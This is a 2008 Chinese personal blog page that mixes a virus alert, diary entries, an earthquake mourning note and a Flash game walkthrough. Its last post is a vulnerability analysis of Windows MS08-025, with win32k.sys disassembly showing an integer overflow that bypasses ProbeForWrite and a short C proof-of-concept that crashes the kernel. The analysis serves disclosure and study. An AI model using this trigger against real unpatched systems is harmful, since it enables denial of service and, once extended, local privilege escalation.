该机器狗新变种可修改注册表,使几乎所有具备主动防御功能的安全软件失效并瘫痪。此外,为实现最大限度的传播,该变种还会对局域网中的其它电脑发送ARP干扰,入侵局域网内的电脑。因此,它对网吧、企业等局域网用户危害巨大。

该病毒运行后,将释放两个病毒文件,分别是“C:Documents and SettingsAll Users「开始」菜单程序启动”目录下的explorer.exe,以及C:盘根目录下的uninsep.bat。很明显,病毒是想将这两个文件释放到系统盘中,然后接管冰点或者硬盘保护卡对硬盘的读写操作,破解还原系统的保护,使冰点、硬盘保护卡失效。最后利用系统漏洞和多款应用软件漏洞,从http://xx.exiao***.com/ 、http://www.h***.biz/ 、http://www.xqh***.com/等多个网站疯狂下载数百个病毒文件,这些病毒伪装成文本文档、图片文件等,欺骗用户点击。病毒一旦运行起来,就会引发无法估计的破坏行为。

  据了解,本周内广大电脑用户除了需要警惕“机器狗变种208896 ”之外,还需要特别警惕“反病毒诈骗器555520”(Win32.RiskWare.XPAntivirus.cs.555520)与“漏洞下载器9423”(JS.Agent.nl.9423.9423)两大病毒。前者是一个具有诈骗功能的流氓软件,它伪装成一个安全软件,欺骗用户安装,然后告知用户在电脑系统中发现恶意程序,要求用户付款以取得解决方法;后者是一个木马下载器,主要是利用网页挂马和捆绑在视频文件中进行传播。它利用系统MS06-014漏洞,以及“百度搜霸工具条、“暴风影音”、迅雷等第三方软件漏洞来下载大量盗号木马,危害用户的虚拟财产。

五月 28th, 2008

Posted In: 未分类

时间一分一秒的过去,看来今天又没了睡意,早已习惯了这种生活,电脑,酒精的麻醉,或许只有打开电脑或是连上网络,我才能发现我的存在,看着一个个的朋友都亮着头标,偶尔只是一个简单的问候,技术群里面永远都有人有问不完的问题,有时我也会说几句,当回老大的感觉,可现实中我什么都不是,现实我原来一直生活在我自己的梦境中,不知道喝了多少白酒,抬头看看窗外,夜也不是那么的黑,好像还有点亮,只不过没有星星和月亮,就像迷芒的我一样,不知道该何去何从,我知道都是因为我太懦弱,是我根本不够坚强,熟知的时间,睡上两小时,也就在没了睡意,在我身边的陪伴我的永远是电脑,原来真的成了我的半个老婆,酒精的麻醉,使我全身没劲,知道梦已经醒了,可我是否也跟着清醒,好像我还在沉睡……..

五月 26th, 2008

Posted In: 未分类

5.12,全国震惊,全球震惊,汶川地震,牵动13亿中国人的心,5.19全国哀悼日,我第一次感觉到原来是这么的痛心,心里的感觉我说不出,无数的人走上街头,天桥,高速路边停满了车,为四川的同胞默哀,我亲眼目睹,那一声声的鸣笛声,声声刺痛人心,记每个中国人记住这个时刻,让全球看看中国人的团结../../512.swf

五月 20th, 2008

Posted In: 未分类

http://comic.qq.com/flash/2005/20050527zuie.swf
第一:点击汽车,然后找到边上的棍子第二:在最右边发现树上有一个东西,然后点击物品栏里面的棍子,在点击树上的东西,然后在点掉下来的东西用方大镜查看,发现里面有一个密码,这个密码是电子门的密码,输入后可进屋,然后就点边上的那个门,发现一个火机,拿起火机以后有用,然后上二楼发现卫生间有把钥匙,在手纸盒上面,然后找对和钥匙色相应的门去打开门,然后看花篮,里面有一把钥匙,在去开相应的门,这个时候留心一下那个物品架,一会会丢一个东西,这个时候点床,在床上有一把钥匙,然后在点击边上一个门,在拿好浴池开关边上的钥匙后在去开门,这次在厨房里面,先点下物品栏的火机,然后去点蜡烛,然后点击一块肉,出来在拿一个盘子和一瓶酒,然后用放大镜放大盘子,然后双击肉后在在盘子点一下,把肉放在盘子里面,然后在点击酒,在肉上面倒上酒一会要给狗吃,不然你过不去,出去后发现狗,你就直接在狗盆里面点一下,然后狗就game over了,这个时候你从大门在进去,只不过要重新输一次密码,然后进去上二楼,在转脚台处有一把粉色的钥匙,拿起来在去开相应的门,进去以后在开玻璃门,然后在窗台上有把钥匙,拿起来,然后在桌子上有一杯子,然后拿杯子,点击杯子然后在接点水,以后要用到,上楼去开门,醒后在去刚才拿钥匙的那个地方,点手提箱,然后用方大镜放大,在双击手提箱,然后用找到的钥匙开电脑房的门,就是蓝色的那个门,在书架上发现一本书,然后在在外面发现一把钥匙,在点窗子,然后发现人是从上面掉下来的,在点对面楼上的扶手,这个时候就可以发现楼顶还有一把钥匙,在拿起来,然后去边上的杂物房找一根电话线,然后出门去在屋外去找雕像,在用橙色的钥匙去开门,然后开了橙色的门以后,在点玻璃门,发现老头,然后用水泼醒他,然后在边上屋子点击镜子,后面出来一个钥匙孔,然后打开书上面的电话输入对面墙的密码,这个时候放入小佛像,然后关灯看对面的色,按色放钥匙才可以,然后文件给那人去打电话,发现原来死的是博士,刚才那个人就是凶手,游戏结束
这可是偶自己玩了一半小时玩过的,然后自己写的攻略

五月 5th, 2008

Posted In: 未分类

Author: Polymorphours
Email: Polymorphours@whitecell.org

经内部讨论后决定公布分析成果。

4月8号microsoft再次发布了一个系统内核的补丁(KB941693),微软对该漏洞的描述为: 此安全更新解决 Windows 内核中一个秘密报告的漏洞。 成功利用此漏洞的本地攻击者可以完全控制受影响的系统。 攻击者可随后安装程序;查看、更改或删除数据;或者创建新帐户。这是用于 Windows 2000、Windows XP、Windows Server 2003、Windows Vista 和 Windows Server 2008 所有受支持版本的重要安全更新。此安全更新通过修改 Windows 内核验证从用户模式传递过来的输入的方式来解决此漏洞。

从这个介绍中我们看到这个漏洞影响非常广,从2000到2008。为了能一睹这个漏洞的细节,我分析了ms08-025的补丁,发现该漏洞存在于 win32k.sys 模块中。在这个补丁中修补了win32k.sys中的多个地方,其中出问题的地方非常有趣,是因为溢出寄存器来绕过 ProbeForWrite 函数对用户层传来的指针的检查,下面我们就从 NtUserfnOUTSTRING 函数中的问题来展开我们的分析(我分析的平台是winxp sp2)

.text:BF86FB04 ; int __stdcall NtUserfnOUTSTRING(int,int,int,PVOID Address,int,int,int)
.text:BF86FB04 __stdcall NtUserfnOUTSTRING(x, x, x, x, x, x, x) proc near
.text:BF86FB04 ; CODE XREF: xxxDefWindowProc(x,x,x,x)+6E p
.text:BF86FB04 ; NtUserMessageCall(x,x,x,x,x,x,x)+61 p
.text:BF86FB04 ; xxxSendMessageToClient(x,x,x,x,x,x,x)-E p
.text:BF86FB04 ; xxxSendMessageToClient(x,x,x,x,x,x,x)+6D p
.text:BF86FB04 ; xxxWrapCallWindowProc(x,x,x,x,x)-4B p
.text:BF86FB04 ; xxxWrapCallWindowProc(x,x,x,x,x)+60 p …
.text:BF86FB04
.text:BF86FB04 var_24 = dword ptr -24h
.text:BF86FB04 var_20 = dword ptr -20h
.text:BF86FB04 UserBuffer = dword ptr -1Ch
.text:BF86FB04 ms_exc = CPPEH_RECORD ptr -18h
.text:BF86FB04 arg_0 = dword ptr 8
.text:BF86FB04 arg_4 = dword ptr 0Ch
.text:BF86FB04 arg_8 = dword ptr 10h
.text:BF86FB04 Address = dword ptr 14h
.text:BF86FB04 arg_10 = dword ptr 18h
.text:BF86FB04 arg_14 = dword ptr 1Ch
.text:BF86FB04 arg_18 = dword ptr 20h
.text:BF86FB04
.text:BF86FB04 ; FUNCTION CHUNK AT .text:BF86FAE1 SIZE 0000001E BYTES
.text:BF86FB04
.text:BF86FB04 push 14h
.text:BF86FB06 push offset unk_BF98D250
.text:BF86FB0B call __SEH_prolog
.text:BF86FB0B
.text:BF86FB10 xor edx, edx
.text:BF86FB12 mov [ebp+ms_exc.disabled], edx
.text:BF86FB15 mov eax, [ebp+var_20]
.text:BF86FB18 mov ecx, 7FFFFFFFh
.text:BF86FB1D and eax, ecx
.text:BF86FB1F mov esi, [ebp+arg_18]
.text:BF86FB22 shl esi, 1Fh
.text:BF86FB25 or eax, esi
.text:BF86FB27 mov [ebp+var_20], eax
.text:BF86FB2A mov esi, eax
.text:BF86FB2C xor esi, [ebp+arg_8] -> esi = 缓冲区长度
.text:BF86FB2F and esi, ecx
.text:BF86FB31 xor eax, esi
.text:BF86FB33 mov [ebp+var_20], eax
.text:BF86FB36 cmp [ebp+arg_18], edx -> 如果是 ansi 方式就直接进行检查,否则需要计算unicode的大小
.text:BF86FB39 jnz short loc_BF86FB47
.text:BF86FB39
.text:BF86FB3B lea esi, [eax+eax] <- 注意这里,问题就在这里,此时 eax = unicode字符串的长度, <- 当 eax = 0x80000000 的时候 eax + eax = 0x100000000,32位的寄存器 <- 被溢出了,esi = 0 .text:BF86FB3E xor esi, eax .text:BF86FB40 and esi, ecx .text:BF86FB42 xor eax, esi .text:BF86FB44 mov [ebp+var_20], eax -> 保存unicode占用的空间大小
.text:BF86FB44
.text:BF86FB47
.text:BF86FB47 loc_BF86FB47: ; CODE XREF: NtUserfnOUTSTRING(x,x,x,x,x,x,x)+35 j
.text:BF86FB47 mov [ebp+var_24], edx
.text:BF86FB4A mov esi, [ebp+Address]
.text:BF86FB4D mov [ebp+UserBuffer], esi
.text:BF86FB50 xor ebx, ebx
.text:BF86FB52 inc ebx
.text:BF86FB53 push ebx ; Alignment
.text:BF86FB54 and eax, ecx
.text:BF86FB56 push eax ; Length <- 由于 eax = 0,所以ProbeForWrite被绕过 .text:BF86FB57 push esi ; Address .text:BF86FB58 call ds:ProbeForWrite(x,x,x) bf80a1b0 e96ef4ffff jmp win32k!xxxRealDefWindowProc+0x1235 (bf809623) bf80a1b5 d1e8 shr eax,1 bf80a1b7 894510 mov [ebp+0x10],eax bf80a1ba ebf1 jmp win32k!xxxRealDefWindowProc+0x190 (bf80a1ad) bf80a1bc 8b4514 mov eax,[ebp+0x14] bf80a1bf f6400780 test byte ptr [eax+0x7],0x80 bf80a1c3 8b4008 mov eax,[eax+0x8] bf80a1c6 7408 jz win32k!xxxRealDefWindowProc+0x105 (bf80a1d0) bf80a1c8 c60000 mov byte ptr [eax],0x0 bf80a1cb e951f4ffff jmp win32k!xxxRealDefWindowProc+0x1225 (bf809621) bf80a1d0 668910 mov [eax],dx <- 在这里,对前面传入的指针进行了2个字节的写操作,写入的数据为0 bf80a1d3 e949f4ffff jmp win32k!xxxRealDefWindowProc+0x1225 (bf809621) bf80a1d8 6a00 push 0x0 bf80a1da 6a02 push 0x2 bf80a1dc ff7638 push dword ptr [esi+0x38] bf80a1df e8d1690200 call win32k!BuildHwndList (bf830bb5) bf80a1e4 8bf8 mov edi,eax bf80a1e6 85ff test edi,edi bf80a1e8 0f8433f4ffff je win32k!xxxRealDefWindowProc+0x1225 (bf809621) bf80a1ee 8d7710 lea esi,[edi+0x10] 那么怎么触发这个漏洞呢,我又分析了 user32.dll 和 win32k!NtUserMessageCall,发现触发这个漏洞很简单,只需要调用SendMessageW 发送WM_GETTEXT 消息就能够触发了,下面是poc代码(注,改代码运行后由于在内核写了未映射的内存,会直接蓝屏,要改成可用的exploit,可以参考我以前的exploit) #include
#include

int main(int argc,char *argv[])
{
DWORD dwHookAddress = 0x80000000;

printf( "tMS08-025 Local Privilege Escalation Vulnerability Exploit(POC)nn" );
printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/04/10n" );

SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, dwHookAddress );
return 0;
}

五月 4th, 2008

Posted In: 未分类

无觅相关文章插件,快速提升流量